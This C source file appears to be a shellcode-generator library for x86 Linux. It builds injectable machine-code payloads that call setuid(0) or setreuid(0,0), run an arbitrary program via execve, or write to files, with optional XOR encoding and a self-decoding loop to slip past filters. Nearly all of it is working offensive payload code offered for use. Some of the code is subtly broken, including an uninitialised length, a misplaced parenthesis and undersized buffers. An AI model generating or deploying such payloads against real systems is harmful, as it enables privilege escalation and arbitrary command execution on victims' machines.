/*
 *     __   ___   _
 *    /  \ |   \ | | /\--------<ShellCodes Generator Library>----------------->
 *   / /\ \| |\ \| |/ /
 *  / /__\ \    /|   /          libShellCodes is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 *
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include "codes.h"

/*
 * Function:    initialize_codes()
 * Parameters:
 * Return:
 * Description: Initialize the codes used to build the ShellCodes
 *
 */

void initialize_codes()
{
  // Find the actual memory adress
  JMP          = (char *) strdup("\xeb\x01");               // jmp    call
  CALL         = (char *) strdup("\xe8\x01\xff\xff\xff");   // call   pop
  POP_ESI      = (char *) strdup("\x5e");                   // popl   %esi
  
  // zeroing a register
  XOR_EAX_EAX  = (char *) strdup("\x31\xc0");               // xor    %eax, %eax
  XOR_EBX_EBX  = (char *) strdup("\x31\xdb");               // xor    %ebx, %ebx
  XOR_ECX_ECX  = (char *) strdup("\x31\xc9");               // xor    %ecx, %ecx
  XOR_EDX_EDX  = (char *) strdup("\x31\xd2");               // xor    %edx, %edx 
  
  // Move a value to a register
  MOV_IN_AL    = (char *) strdup("\xb0\x01");               // movb   $0x1, %al
  MOV_IN_CL    = (char *) strdup("\xb1\x01");               // movb   $0x1, %cl
  MOV_IN_DL    = (char *) strdup("\xb2\x01");               // movb   $0x1, %dl
  MOV_IN_CX    = (char *) strdup("\x66\xb9\x01\x01");       // movw   $0x101, %cx
  
  // Move a register to a register
  MOV_EAX_EBX  = (char *) strdup("\x89\xc3");               //mov     %eax, %ebx
  MOV_ESI_EBX  = (char *) strdup("\x89\xf3");               //mov     %esi, %ebx
  MOV_ESI_ECX  = (char *) strdup("\x89\xf1");               //mov     %esi, %ecx

  // Move a register to memory
  MOV_DL_nESI  = (char *) strdup("\x88\x56\x01");           //movb    %dl, 0x1(%esi)    
  MOV_AL_nESI  = (char *) strdup("\x88\x46\x01");           //movb    %al, 0x1(%esi)       
  MOV_ESI_nESI = (char *) strdup("\x89\x76\x01");           //mov     %esi, 0x1(%esi)
  MOV_EAX_nESI = (char *) strdup("\x89\x46\x01");           //mov     %eax, 0x1(%esi)
  
  // Increment, decrement a register
  INC_EAX      = (char *) strdup("\x40");                   // inc    %eax 
  INC_EBX      = (char *) strdup("\x43");                   // inc    %ebx 

  // Add and sub
  ADD_BL       = (char *) strdup("\x80\xc3\x01");           // add    $0x1, %bl
  SUB_EBX      = (char *) strdup("\x83\xeb\x01");           // sub    $0x1, %ebx

  // XOR memory
  XOR_AL_EBX   = (char *) strdup("\x30\x03");               // xor    %al,(%ebx)

  // Lea
  LEA_nEBX_ECX = (char *) strdup("\x8d\x4b\x01");           // leal   0x1(%ebx), %ecx 
  LEA_nESI_ECX = (char *) strdup("\x8d\x4e\x01");           // leal   0x1(%esi), %ecx 
  LEA_nESI_EDX = (char *) strdup("\x8d\x56\x01");           // leal   0x1(%esi), %edx 

  // Loop
  LOOP         = (char *) strdup("\xe2\xfb");               // loop   xor

  // Interrupt calling
  INT_80       = (char *) strdup("\xcd\x80");               // int    $0x80
  
  // Completed System Calls
  EXIT_0       = (char *) strdup("\x31\xc0\x31\xdb\x40\xcd\x80");
                                  // xor    %eax, %eax      #  0x31 0xc0
                                  // xor    %ebx, %ebx      #  0x31 0xdb
                                  // inc    %eax            #  0x40
                                  // int    $0x80           #  0xcd 0x80
  SETUID_0     = (char *) strdup("\x31\xc0\x31\xdb\xb0\x17\xcd\x80");
                                  // xor    %eax, %eax      #  0x31 0xc0 
                                  // xor    %ebx, %ebx      #  0x31 0xdb
                                  // movb   $0x17,%al       #  0x88 0x46 0x23
                                  // int    $0x80           #  0xcd 0x80 
  SETREUID_0_0 = (char *) strdup("\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80");
                                  // xor    %eax,%eax
                                  // xor    %ebx,%ebx
                                  // xor    %ecx,%ecx
                                  // mov    $0x46,%al
                                  // int    $0x80
}


/*
 * Function:    free_codes()
 * Parameters:
 * Return:
 * Description: Free the memory used for the codes
 *
 */

void free_codes()
{
  free(JMP);
  free(CALL);     
  free(POP_ESI);
   
  free(XOR_EAX_EAX);  
  free(XOR_EBX_EBX);  
  free(XOR_ECX_ECX);  
  free(XOR_EDX_EDX);

  free(MOV_IN_AL);  
  free(MOV_IN_CL); 
  free(MOV_IN_DL);   
  free(MOV_IN_CX);  

  free(MOV_EAX_EBX); 
  free(MOV_ESI_EBX);
  free(MOV_ESI_ECX);

  free(MOV_DL_nESI); 
  free(MOV_AL_nESI);  
  free(MOV_ESI_nESI);
  free(MOV_EAX_nESI);    

  free(INC_EAX);   
  free(INC_EBX); 

  free(ADD_BL); 
  free(SUB_EBX);

  free(XOR_AL_EBX);

  free(LEA_nEBX_ECX); 
  free(LEA_nESI_ECX); 
  free(LEA_nESI_EDX);

  free(LOOP);

  free(INT_80);   
  free(EXIT_0); 
  free(SETUID_0);
  free(SETREUID_0_0);
}


/*
 * Function:    cript()
 * Parameters:  
 * Return:
 * Description: Cript the code
 *
 */

void cript(char *buff, char pad)
{
  int h, lung;

  lung=strlen(buff);

  for (h=0;h<lung;h++)
    {
      buff[h]^=pad;
    }
}


/*
 * Function:    char_rnd_gen()
 * Parameters:  
 * Return:
 * Description: Generate a random character
 *
 */

unsigned char char_rnd_gen()
{
  struct timeval tv;
  gettimeofday(&tv,NULL);
  srand(tv.tv_usec);
  return (char) rand();
}


/*
 * Function:    xor_check()
 * Parameters:  
 * Return:
 * Description: Check if some characters inside the ShellCode are equal to the
 *              byte which the code will be critped with. The result of XORing a
 *              value with itself is 0 which it is not goot for a ShellCode.
 *
 */

int xor_check(char *code, char xor_byte)
{
  int i;
  for (i=0; i<strlen(code); i++)
    {
      if (code[i]==xor_byte) return 1;
    }
  return 0;
}


/*
 * Function:    generate_file_write_SC()
 * Parameters:  char *file      the name of the file in which you want write
 *              char *message   the message that you want write
 *              int  setuid     0 = none
 *                              1 = execute setuid(0)
 *                              2 = execute setreuid(0, 0)
 *              int  xor        0 = not encripted
 *                              1 = XOR Encription
 * Return:      char *          the pointer to the ShellCode generated
 * Description: Generates a ShellCode that writes a message in a file
 *
 */

char *generate_file_write_SC(char *file, char *message, int setuid, int xor)
{
  int lenfile, lenmsg;
  char pre_pop[64], after_pop[128], xor_code[64], *shellcode;
  unsigned char xor_byte;

  initialize_codes();

  lenmsg = strlen(message);
  lenfile = strlen(file);

  switch(setuid)
    {
    case 1:
      sprintf(after_pop, "%s\0", SETUID_0);
      break;
    case 2:
      sprintf(after_pop, "%s\0", SETREUID_0_0);
      break;
    default:
      after_pop[0]=0;
      break;
    }
  pre_pop[0]=0;

  sprintf(after_pop, "%s%s%s%s\0", after_pop, XOR_EAX_EAX, XOR_ECX_ECX, XOR_EDX_EDX);

  // Open
  MOV_IN_AL[1] = 5;                    // Select the open() system call
  MOV_IN_CX[2] = 0x42;                 // Open with O_RDWR|O_CREAT|O_APPEND attrib
  MOV_IN_CX[3] = 0x04;
  MOV_DL_nESI[2] = (char) lenfile;     // Put \0 at the end of the filename

  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_IN_AL, MOV_ESI_EBX);
  sprintf(after_pop, "%s%s%s%s\0", after_pop, MOV_IN_CX, MOV_DL_nESI, INT_80);

  // Write
  LEA_nEBX_ECX[2] = (char) ++lenfile;  // ECX point to the beginning of the message
  MOV_IN_AL[1] = 4;                    // Select the write() system call
  MOV_IN_DL[1] = (char) lenmsg;        // Put in EDX the lenght of the message

  sprintf(after_pop, "%s%s%s\0", after_pop, LEA_nEBX_ECX, MOV_EAX_EBX);
  sprintf(after_pop, "%s%s%s\0", after_pop, XOR_EAX_EAX, MOV_IN_AL);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_IN_DL, INT_80);

  // Exit
  sprintf(after_pop, "%s%s\0", after_pop, EXIT_0);

  // XOR Encription
  xor_code[0]=0;
  if (xor == 1)
    {
      xor_byte = char_rnd_gen();
      while((xor_check(after_pop, xor_byte)||xor_check(file, xor_byte||xor_check(message, xor_byte))))
	{
	  xor_byte = char_rnd_gen();
	}

      cript(after_pop, xor_byte);
      cript(file, xor_byte); 
      cript(message, xor_byte); 

      MOV_IN_AL[1] = xor_byte;
      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(file) + strlen(message) + strlen(CALL) + 1);
      SUB_EBX[2] = (char) (strlen(after_pop) + strlen(CALL));
      LOOP[1] = 0xfb;
      
      sprintf(xor_code, "%s%s%s", XOR_ECX_ECX, MOV_IN_AL, MOV_IN_CL);
      sprintf(xor_code, "%s%s%s", xor_code, MOV_ESI_EBX, SUB_EBX);
      sprintf(xor_code, "%s%s%s", xor_code, XOR_AL_EBX, INC_EBX);
      sprintf(xor_code, "%s%s", xor_code, LOOP); 
    }

  JMP[1] = (char) (strlen(after_pop) + strlen(xor_code) + 1);
  CALL[1] = (char) (0xFF - (strlen(after_pop) + strlen(xor_code) + 4 + 1));

  sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
  sprintf(after_pop, "%s%s\0", after_pop, CALL);

  shellcode = (char *) malloc(strlen(pre_pop)+strlen(after_pop)+strlen(file)+strlen(message)+strlen(xor_code));
  sprintf(shellcode, "%s%s%s%s\x31%s\0", pre_pop, xor_code, after_pop, file, message);

  free_codes();

  return shellcode;
}


/*
 * Function:    generate_write_SC()
 * Parameters:  int out         1 = stdout - 2 = stderr
 *              char *message   the message that you want write
 *              int  setuid     0 = none
 *                              1 = execute setuid(0)
 *                              2 = execute setreuid(0, 0)
 *              int  xor        0 = not encripted
 *                              1 = XOR Encription
 * Return:      char *          the pointer to the ShellCode generated
 * Description: Generates a ShellCode that writes a message to stdout or stderr
 *
 */

char *generate_write_SC(int out, char *message, int setuid, int xor)
{
  int lenfile, lenmsg;
  char pre_pop[64], after_pop[128], xor_code[64], *shellcode;
  unsigned char xor_byte;

  initialize_codes();

  lenmsg = strlen(message);

  switch(setuid)
    {
    case 1:
      sprintf(after_pop, "%s\0", SETUID_0);
      break;
    case 2:
      sprintf(after_pop, "%s\0", SETREUID_0_0);
      break;
    default:
      after_pop[0]=0;
      break;
    }
  pre_pop[0]=0;

  sprintf(after_pop, "%s%s%s%s\0", after_pop, XOR_EAX_EAX, XOR_EBX_EBX, XOR_EDX_EDX);


  // Write
  LEA_nEBX_ECX[2] = (char) ++lenfile;  // ECX point to the beginning of the message
  MOV_IN_AL[1] = 4;                    // Select the write() system call
  MOV_IN_DL[1] = (char) lenmsg;        // Put in EDX the lenght of the message

  if (out == 1)  ADD_BL[2] = 1; // stdout
  if (out == 2)  ADD_BL[2] = 2; // stderr

  sprintf(after_pop, "%s%s%s%s\0", after_pop, MOV_ESI_ECX, ADD_BL, MOV_IN_AL);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_IN_DL, INT_80);

  // Exit
  sprintf(after_pop, "%s%s\0", after_pop, EXIT_0);

  // XOR Encription
  xor_code[0]=0;
  if (xor == 1)
    {
      xor_byte = char_rnd_gen();
      while((xor_check(after_pop, xor_byte)||xor_check(message, xor_byte)))
	{
	  xor_byte = char_rnd_gen();
	}

      cript(after_pop, xor_byte); 
      cript(message, xor_byte); 

      MOV_IN_AL[1] = xor_byte;
      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(message) + strlen(CALL) + 1);
      SUB_EBX[2] = (char) (strlen(after_pop) + strlen(CALL));
      LOOP[1] = 0xfb;
         
      sprintf(xor_code, "%s%s%s", XOR_ECX_ECX, MOV_IN_AL, MOV_IN_CL);
      sprintf(xor_code, "%s%s%s", xor_code, MOV_ESI_EBX, SUB_EBX);
      sprintf(xor_code, "%s%s%s", xor_code, XOR_AL_EBX, INC_EBX);
      sprintf(xor_code, "%s%s", xor_code, LOOP); 
    }

  JMP[1] = (char) (strlen(after_pop) + strlen(xor_code) + 1);
  CALL[1] = (char) (0xFF - (strlen(after_pop) + strlen(xor_code) + 4 + 1));

  sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
  sprintf(after_pop, "%s%s\0", after_pop, CALL);

  shellcode = (char *) malloc(strlen(pre_pop)+strlen(after_pop)+strlen(message)+strlen(xor_code));
  sprintf(shellcode, "%s%s%s%s\0", pre_pop, xor_code, after_pop, message);

  free_codes();

  return shellcode;
}


/*
 * Function:    generate_exec_SC()
 * Parameters:  char * prog     the path of the command to execute
 *              int  setuid     0 = none
 *                              1 = execute setuid(0)
 *                              2 = execute setreuid(0, 0)
 *              int  xor        0 = not encripted
 *                              1 = XOR Encription
 * Return:      char *          the pointer to the ShellCode generated
 * Description: Generates a ShellCode that executes the command you specified
 *
 */

char *generate_exec_SC(char *prog, int setuid, int exit, int xor)
{
  int lenprog;
  char pre_pop[64], after_pop[128], xor_code[64], *shellcode;
  unsigned char xor_byte;
  
  initialize_codes();

  switch(setuid)
    {
    case 1:
      sprintf(after_pop, "%s\0", SETUID_0);
      break;
    case 2:
      sprintf(after_pop, "%s\0", SETREUID_0_0);
      break;
    default:
      after_pop[0]=0;
      break;
    }
  pre_pop[0]=0;
  lenprog = strlen(prog);

  // Execve
  MOV_AL_nESI[2] = (char) lenprog;
  MOV_ESI_nESI[2] = (char) (lenprog+1);
  MOV_EAX_nESI[2] = (char) (lenprog+5);
  MOV_IN_AL[1] = 0xb;
  LEA_nESI_ECX[2] = (char) (lenprog+1);
  LEA_nESI_EDX[2] = (char) (lenprog+5);

  sprintf(after_pop, "%s%s%s%s\0", after_pop, XOR_EAX_EAX, MOV_AL_nESI, MOV_ESI_nESI);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_EAX_nESI, MOV_IN_AL);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_ESI_EBX, LEA_nESI_ECX);
  sprintf(after_pop, "%s%s%s\0", after_pop, LEA_nESI_EDX, INT_80);

  // Exit
  if (exit == 1) sprintf(after_pop, "%s%s\0", after_pop, EXIT_0);

  // XOR Encription
  xor_code[0]=0;
  if (xor == 1)
    {
      xor_byte = char_rnd_gen();
      while((xor_check(after_pop, xor_byte)||xor_check(prog, xor_byte)))
	{
	  xor_byte = char_rnd_gen();
	}

      cript(after_pop, xor_byte); 
      cript(prog, xor_byte); 

      MOV_IN_AL[1] = xor_byte;
      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(prog) + strlen(CALL) + 1);
      SUB_EBX[2] = (char) (strlen(after_pop) + strlen(CALL));
      LOOP[1] = 0xfb;
      
      sprintf(xor_code, "%s%s%s", XOR_ECX_ECX, MOV_IN_AL, MOV_IN_CL);
      sprintf(xor_code, "%s%s%s", xor_code, MOV_ESI_EBX, SUB_EBX);
      sprintf(xor_code, "%s%s%s", xor_code, XOR_AL_EBX, INC_EBX);
      sprintf(xor_code, "%s%s", xor_code, LOOP); 
    }

  JMP[1] = (char) (strlen(after_pop) + strlen(xor_code) + 1);
  CALL[1] = (char) (0xFF - (strlen(after_pop) + strlen(xor_code) + 4 + 1));

  sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
  sprintf(after_pop, "%s%s\0", after_pop, CALL);

  shellcode = (char *) malloc(strlen(pre_pop)+strlen(after_pop)+strlen(prog)+strlen(xor_code));
  sprintf(shellcode, "%s%s%s%s\0", pre_pop, xor_code, after_pop, prog);

  free_codes();

  return shellcode;
}
